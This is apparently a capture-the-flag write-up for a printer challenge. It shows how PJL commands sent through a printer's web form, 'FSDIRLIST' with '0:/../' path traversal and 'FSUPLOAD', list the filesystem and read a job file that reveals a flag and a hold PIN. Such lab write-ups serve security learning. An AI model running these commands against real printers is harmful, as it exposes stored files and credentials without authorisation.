Wander
My uncle isn’t allowing me to print documents. He’s off to vacation and I need a PIN to unlock this printer. All I found is a web server where this printer is managed from. Can you help me with this situation ?
Steps
- Start by navigating to the webpage by pasting the ip:port into browser
- The only tab that brough up a new page was
Job Controls, which brough up the path/jobs - Submitting text brought up the path
/printer - This is evident when inspecting the html code
<form action="printer" method="post">
<input type="text" placeholder="@PJL INFO ID" name="pjl">
<input type="submit" value="Send">
</form>
- Submitting
@PJL INFO IDreturnsHTB Printer - PJL stands for HP Printer Job Language, so I looked for more PJL commands from HP which brought me to this document
- I also found a reference for hacking printers here, but that was not needed for this challenge
- The main command I used was
FSDIRLISTto view and traverse the filesystem
# view current directory
@PJL FSDIRLIST NAME="0:" ENTRY=1
# view parent directory
@PJL FSDIRLIST NAME="0:/../" ENTRY=1
- Once in the parent directory, I saw a home folder listed
# navigating to home folder
@PJL FSDIRLIST NAME="0:/../home/" ENTRY=1
- The
homefolder contained a folder calleddefault, which contained a filereadysize - To see file contents, we use
FSUPLOAD
# command
@PJL FSUPLOAD NAME="0:/../home/default/readyjob"
# contents
@PJL FSUPLOAD FORMAT:BINARY NAME="0:/../home/default/readyjob" OFFSET=0 SIZE=457
%-12345X@PJL @PJL COMMENT FLAG = "HTB{w4lk_4nd_XXXXXX}" @PJL JOB NAME = "JetDirectBoot Job" @PJL SET
USERNAME="default" @PJL SET HOLDKEY="8214" @PJL SET ORIENTATION = PORTAIT @PJL SET QTY = 1 @PJL SET DUPLEX = ON @PJL SET RESOLUTION = 600 @PJL SET OUTBIN = LOWER
@PJL COMMENT START PCL JOB @PJL ENTER LANGUAGE = PCL %-12345X@PJL @PJL EOJ %-12345X